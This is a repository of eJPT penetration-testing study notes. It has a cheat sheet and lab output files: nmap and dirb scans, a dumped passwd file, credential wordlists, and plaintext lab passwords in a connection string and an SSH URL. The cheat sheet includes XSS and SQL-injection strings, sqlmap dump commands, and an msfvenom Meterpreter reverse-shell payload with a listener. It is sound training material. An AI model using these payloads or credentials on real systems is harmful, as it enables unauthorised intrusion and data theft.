Repository: JasonTurley/eJPT
Branch: main
Commit: 4a608ce9afa0
Files: 71
Total size: 126.3 KB
Directory structure:
gitextract_f6pnax8e/
├── LICENSE
├── README.md
├── cheat-sheet.md
├── ine-labs/
│ ├── arp-poisoning/
│ │ ├── alive_hosts.txt
│ │ └── nmap_scan.txt
│ ├── black-box1/
│ │ ├── alive_hosts.txt
│ │ ├── dot101_DONE/
│ │ │ ├── README.md
│ │ │ ├── default-passwords.txt
│ │ │ ├── default-users.txt
│ │ │ └── passwd
│ │ ├── dot140_done/
│ │ │ ├── dirb_scan2.txt
│ │ │ ├── sdadas.txt
│ │ │ └── test1.txt
│ │ ├── dot199/
│ │ │ ├── enum4linux.txt
│ │ │ └── nmap_scan.txt
│ │ ├── id_rsa.pub
│ │ ├── initial_nmap_scan.txt
│ │ ├── possible-usernames.txt
│ │ └── thorough_nmap_scan.txt
│ ├── black-box2/
│ │ ├── alive_hosts.txt
│ │ ├── dot166_DONE/
│ │ │ ├── dirb_scan.txt
│ │ │ ├── for_hydra.txt
│ │ │ └── names.txt
│ │ ├── dot81_DONE/
│ │ │ ├── dirb_scan.txt
│ │ │ └── users.bak
│ │ ├── dot91/
│ │ │ ├── dirb_scan.txt
│ │ │ ├── gobuster_foocorp_scan.txt
│ │ │ ├── gobuster_foocorp_scan2.txt
│ │ │ ├── gobuster_scan.txt
│ │ │ ├── myapp.html
│ │ │ └── php-reverse-shell.php
│ │ ├── dot92_DONE/
│ │ │ ├── dirb_scan.txt
│ │ │ └── user-hashes.txt
│ │ └── thorough_nmap_scan.txt
│ ├── black-box3/
│ │ ├── alive_hosts.txt
│ │ ├── dot220/
│ │ │ └── gobuster_scan.txt
│ │ ├── dot234/
│ │ │ ├── for_john.txt
│ │ │ ├── gobuster_scan.txt
│ │ │ ├── index.php
│ │ │ ├── revshell.php
│ │ │ └── scan_xyz.txt
│ │ └── thorough_nmap_scan.txt
│ ├── bruteforce-and-password-cracking/
│ │ ├── alive_hosts.txt
│ │ ├── for_john.txt
│ │ ├── nmap_scan.txt
│ │ ├── passwd
│ │ └── shadow
│ ├── dirbuster/
│ │ ├── alive_hosts.txt
│ │ └── nmap_scan.txt
│ ├── exploit-based-cpp/
│ │ ├── exploit.cpp
│ │ └── keylogger.cpp
│ ├── metasploit/
│ │ ├── README.md
│ │ ├── hashdump.txt
│ │ └── nmap_scan.txt
│ ├── nessus/
│ │ └── nmap_scan.txt
│ ├── null-session/
│ │ ├── Congratulations.txt
│ │ ├── alive_hosts.txt
│ │ ├── enum4linux_scan.txt
│ │ └── nmap_scan.txt
│ ├── practice/
│ │ ├── hello.php
│ │ ├── index.html
│ │ ├── my-ls.sh
│ │ ├── script.sh
│ │ ├── sequences.sh
│ │ └── shell.php
│ ├── python-assisted-exploitation/
│ │ └── brute-forcer.py
│ └── scanning-and-os-fingerprinting/
│ ├── fping_scan.txt
│ ├── nmap_ping_scan.txt
│ ├── nmap_syn_scan.txt
│ └── nmap_version_and_os.txt
└── scripts/
└── eEnum.sh
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2022 Jason Turley
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# eJPT
My notes and lab solutions from studying for the eLearnSecurity Junior Penetration Tester certificate.
## Cheat Sheet
Check out the [cheatsheet](./cheat-sheet.md) for a list of useful commands
and tips.
================================================
FILE: cheat-sheet.md
================================================
# Cheat Sheet
This cheat sheet is a list of commands to help with the black box
pen test engagements.
## Networking
Check routing table information
```
$ route
$ ip route
```
Add a network to current route
```
$ ip route add 192.168.10.0/24 via 10.175.3.1
$ route add -net 192.168.10.0 netmask 255.255.255.0 gw 10.175.3.1
```
DNS
```
$ nslookup mysite.com
$ dig mysite.com
```
## Subdomain Enumeration
- [Sublist3r](https://github.com/aboul3la/Sublist3r)
- [DNSdumpster](https://dnsdumpster.com/)
## Footprinting & Scanning
Find live hosts with fping or nmap
```
$ fping -a -g 172.16.100.40/24 2>/dev/null | tee alive_hosts.txt
$ nmap -sn 172.16.100.40/24 -oN alive_hosts.txt
```
nmap scan types
```
-sS: TCP SYN Scan (aka Stealth Scan)
-sT: TCP Connect Scan
-sU: UDP Scan
-sn: Port Scan
-sV: Service Version information
-O: Operating System information
```
### Spotting a Firewall
If an nmap TCP scan identified a well-known service, such as a web server, but
cannot detect the version, then there may be a firewall in place.
For example:
```
PORT STATE SERVICE REASON VERSION
80/tcp open http? syn-ack ttl 64
```
Another example:
```
80/tcp open tcpwrapped
```
**"tcpwrapped"** means the TCP handshake was completed, but the remote host
closed the connection without receiving any data.
These are both indicators that a firewall is blocking our scan with the target!
Tips:
- Use "--reason" to see why a port is marked open or closed
- If a "RST" packet is received, then something prevented the connection - probably a firewall!
## Masscan
Masscan is designed to scan thousands of IP addresses at once.
## Vulnerability Assessment
Use the information from the Enumeration/Footprinting phases to find a vulnerable threat vector.
Below are some helpful Vulnerability assessment resources:
- Searchsploit
- ExploitDB
- Msfconsole search command
- Google
- Nessus
## Web Server Fingerprinting
Use netcat for HTTP banner grabbing:
```
$ nc <target addr> 80
HEAD / HTTP/1.0
```
Use OpenSSL for HTTPS banner grabbing:
```
$ openssl s_client -connect target.site:443
HEAD / HTTP/1.0
```
httprint is a web fingerprinting tool that uses **signature-based** technique
to identify web servers. This is more accurate since sysadmins can customize
web server banners.
```
$ httprint -P0 -h <target hosts> -s <signature file>
```
## Directory and File Enumeration
Pick your favorite URI Enumeration tool
- Gobuster - fast, multi-threaded scanner
- Dirbuster - nice GUI
- Dirb - recursively scans directories
## XSS
Look to exploit user input coming from:
- Request headers
- Cookies
- Form inputs
- POST parameters
- GET parameters
Check for XSS
```
<script>alert(1)</script>
<i>some text</i>
```
Steal cookies:
```
<script>alert(document.cookie)</script>
```
## SQL Injection
Same injection points as XSS.
Boolean Injection:
- and 1=1; -- -
- or 'a'='a'; -- -
Once you determine that a site is vulnerable to SQLi, automate with SQL Map.
```
$ sqlmap -u <url>
$ sqlmap -u <url> -p <parameter>
$ sqlmap -u <url> --tables
$ sqlmap -u <url> -D <database name> -T <table name> --dump
```
## Windows Shares Enumeration
Check what shares are available on a host
```
$ smbclient -L //ip
$ enum4linux -a ip_address
```
## SMB Null Attack
Try to login without a username or password:
```
$ smbclient //ip/share -N
```
## MySQL Database commands
Login to MySQL with password
```
$ mysql --user=root --port=13306 -p -h 172.16.64.81
```
```
> SHOW databases;
> SHOW tables FROM databases;
> USE database;
> SELECT * FROM table;
```
Change table entry values
```
# Add the user tracking1 to the "adm" group
> update users set adm="yes" where username="tracking1";
```
## Meterpreter reverse shell
1. Find vulnerability in target (e.g. LFI/RFI)
2. Set up a Metasploit listener
```
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp # or any payload you wish
set lhost <MY IP>
set lport <PORT> # set to a port open on the target to bypass firewall
run
```
3. Create a matching meterpreter-based executable using msfvenom
```
msfvenon -p linux/x64/meterpreter_reverse_tcp lhost=<MY IP> lport=<PORT> -f elf -o meter
```
4. Upload the payload to target (e.g LFI/RFI)
## Adding Virtual Hosts
In the black box practice labs, we had to add a virtual host to /etc/hosts in
order to connect to the webpage.
```
$ sudo vim /etc/hosts
<IP addr> static.foobar.org
```
## Misc
- Found a webshell/admin panel on a site?
- Run phpinfo(); to determine if it is a PHP shell
- Try to get a reverse shell connection
- Check for flag in the user's home directory
- Enumerate, enumerate, enumerate
================================================
FILE: ine-labs/arp-poisoning/alive_hosts.txt
================================================
10.100.13.36
10.100.13.37
10.100.13.140
================================================
FILE: ine-labs/arp-poisoning/nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Sun Feb 21 18:21:32 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt
Nmap scan report for 10.100.13.36
Host is up (0.085s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.100.13.37
Host is up (0.071s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
23/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.100.13.140
Host is up (0.00020s latency).
All 1000 scanned ports on 10.100.13.140 are closed
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 21 18:21:39 2021 -- 3 IP addresses (3 hosts up) scanned in 7.52 seconds
================================================
FILE: ine-labs/black-box1/alive_hosts.txt
================================================
172.16.64.101
172.16.64.140
172.16.64.182
172.16.64.199
================================================
FILE: ine-labs/black-box1/dot101_DONE/README.md
================================================
# Apache Tomcat Webserver
## Recon
Running gobuster shows hidden /manager directory that requires a username and password.
On the 401 Unauthorized error page, shows an example with username=tomcat and password=s3cret.
## Initial Exploitation
Use msfconsole to search for apache tomcat manager exploit
```
meterpreter > getuid
tomcat8
meterpreter > sysinfo
Computer : xubuntu
OS : Linux 4.4.0-104-generic (amd64)
Meterpreter : java/linux
```
Search for the flag:
```
meterpreter > search -f flag.txt
Found 2 results...
/home/adminels/Desktop/flag.txt (12 bytes)
/home/developer/flag.txt (29 bytes)
meterpreter > cat /home/adminels/Desktop/flag.txt
You did it!
meterpreter > cat /home/developer/flag.txt
Congratulations, you got it!
```
Other users in the home directory:
```
adminels
developer
elsuser
```
================================================
FILE: ine-labs/black-box1/dot101_DONE/default-passwords.txt
================================================
admin
tomcat
password
password1
Password1
manager
root
toor
r00t
s3cret
role1
changethis
================================================
FILE: ine-labs/black-box1/dot101_DONE/default-users.txt
================================================
admin
root
tomcat
role
role1
manager
================================================
FILE: ine-labs/black-box1/dot101_DONE/passwd
================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:112:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:115:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:117:126:RealtimeKit,,,:/proc:/bin/false
saned:x:118:127::/var/lib/saned:/bin/false
usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher:x:120:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
elsuser:x:1000:1000:elsuser,,,:/home/elsuser:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
tomcat8:x:122:129::/usr/share/tomcat8:/bin/false
================================================
FILE: ine-labs/black-box1/dot140_done/dirb_scan2.txt
================================================
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb_scan2.txt
START_TIME: Wed Feb 24 14:11:27 2021
URL_BASE: http://172.16.64.140/project/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
AUTHORIZATION: admin:admin
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.64.140/project/ ----
==> DIRECTORY: http://172.16.64.140/project/backup/
==> DIRECTORY: http://172.16.64.140/project/css/
==> DIRECTORY: http://172.16.64.140/project/images/
+ http://172.16.64.140/project/includes (CODE:403|SIZE:304)
+ http://172.16.64.140/project/index.html (CODE:200|SIZE:6525)
---- Entering directory: http://172.16.64.140/project/backup/ ----
==> DIRECTORY: http://172.16.64.140/project/backup/backup/
==> DIRECTORY: http://172.16.64.140/project/backup/css/
==> DIRECTORY: http://172.16.64.140/project/backup/images/
+ http://172.16.64.140/project/backup/index.html (CODE:200|SIZE:6525)
==> DIRECTORY: http://172.16.64.140/project/backup/test/
---- Entering directory: http://172.16.64.140/project/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.140/project/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.140/project/backup/backup/ ----
================================================
FILE: ine-labs/black-box1/dot140_done/sdadas.txt
================================================
Driver={SQL Server};Server=foosql.foo.com;Database=;Uid=fooadmin;Pwd=fooadmin;
/var/www/html/project/354253425234234/flag.txt
================================================
FILE: ine-labs/black-box1/dot140_done/test1.txt
================================================
https://stackoverflow.com/questions/1134319/difference-between-a-user-and-a-login-in-sql-server
================================================
FILE: ine-labs/black-box1/dot199/enum4linux.txt
================================================
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 24 12:24:59 2021
==========================
| Target Information |
==========================
Target ........... 172.16.64.199
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 172.16.64.199 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for 172.16.64.199 |
=============================================
Looking up status of 172.16.64.199
WIN10 <00> - B <ACTIVE> Workstation Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WIN10 <20> - B <ACTIVE> File Server Service
MAC Address = 00-50-56-A2-AD-96
======================================
| Session Check on 172.16.64.199 |
======================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
================================================
FILE: ine-labs/black-box1/dot199/nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Wed Feb 24 12:18:57 2021 as: nmap -sV --reason -oN nmap_scan.txt 172.16.64.199
Nmap scan report for 172.16.64.199
Host is up, received conn-refused (0.070s latency).
Not shown: 996 closed ports
Reason: 996 conn-refused
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2014 12.00.2000
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 24 12:19:30 2021 -- 1 IP address (1 host up) scanned in 33.26 seconds
================================================
FILE: ine-labs/black-box1/id_rsa.pub
================================================
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAlGWzjgKVHcpaDFvc6877t6ZT2ArQa+OiFteRLCc6TpxJ/lQFEDtmxjTcotik7V3DcYrIv3UsmNLjxKpEJpwqELGBfArKAbzjWXZE0VubmBQMHt4WmBMlDWGcKu8356blxom+KR5S5o+7CpcL5R7UzwdIaHYt/ChDwOJc5VK7QU46G+T9W8aYZtvbOzl2OzWj1U6NSXZ4Je/trAKoLHisVfq1hAnulUg0HMQrPCMddW5CmTzuEAwd8RqNRUizqsgIcJwAyQ8uPZn5CXKWbE/p1p3fzAjUXBbjB0c7SmXzondjmMPcamjjTTB7kcyIQ/3BQfBya1qhjXeimpmiNX1nnQ== rsa-key-20190313###ssh://developer:dF3334slKw@172.16.64.182:22#############################################################################################################################################################################################
================================================
FILE: ine-labs/black-box1/initial_nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Tue Feb 23 21:45:06 2021 as: nmap -sV -O -iL alive_hosts.txt -oN initial_nmap_scan.txt
Nmap scan report for 172.16.64.10
Host is up (0.00021s latency).
All 1000 scanned ports on 172.16.64.10 are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops
Nmap scan report for 172.16.64.101
Host is up (0.061s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:50:56:A2:CE:79 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/23%OT=22%CT=1%CU=37260%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=I%II=I
OS:%TS=8)SEQ(SP=103%GCD=1%ISR=106%TI=Z%CI=I%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7
OS:ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1
OS:=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O
OS:=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 172.16.64.140
Host is up (0.062s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:50:56:A2:ED:B9 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/23%OT=80%CT=1%CU=42454%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10B%TI=Z%CI=I%II=I
OS:%TS=8)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%II=I%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7
OS:ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1
OS:=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O
OS:=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Nmap scan report for 172.16.64.182
Host is up (0.068s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:50:56:A2:10:16 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/23%OT=22%CT=1%CU=39565%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O
OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 172.16.64.199
Host is up (0.065s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
MAC Address: 00:50:56:A2:AD:96 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/23%OT=135%CT=1%CU=43296%PV=Y%DS=1%DC=D%G=Y%M=005056%
OS:TM=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=104%TI=I%CI=I%II=
OS:I%SS=S%TS=A)SEQ(SP=100%GCD=1%ISR=102%TI=I%CI=I%TS=A)OPS(O1=M4E7NW8ST11%O
OS:2=M4E7NW8ST11%O3=M4E7NW8NNT11%O4=M4E7NW8ST11%O5=M4E7NW8ST11%O6=M4E7ST11)
OS:WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=
OS:2000%O=M4E7NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%
OS:DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%
OS:O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 23 21:45:54 2021 -- 5 IP addresses (5 hosts up) scanned in 48.25 seconds
================================================
FILE: ine-labs/black-box1/possible-usernames.txt
================================================
elsadmin
adminels
elsuser
developer
tomcat
manager
root
admin
dummy
nao12023
================================================
FILE: ine-labs/black-box1/thorough_nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Wed Feb 24 13:41:35 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt
Nmap scan report for 172.16.64.101
Host is up (0.074s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)
| 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)
|_ 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
59919/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:50:56:A2:CE:79 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=30533%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=60369EA7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O
OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Uptime guess: 0.129 days (since Wed Feb 24 10:38:56 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
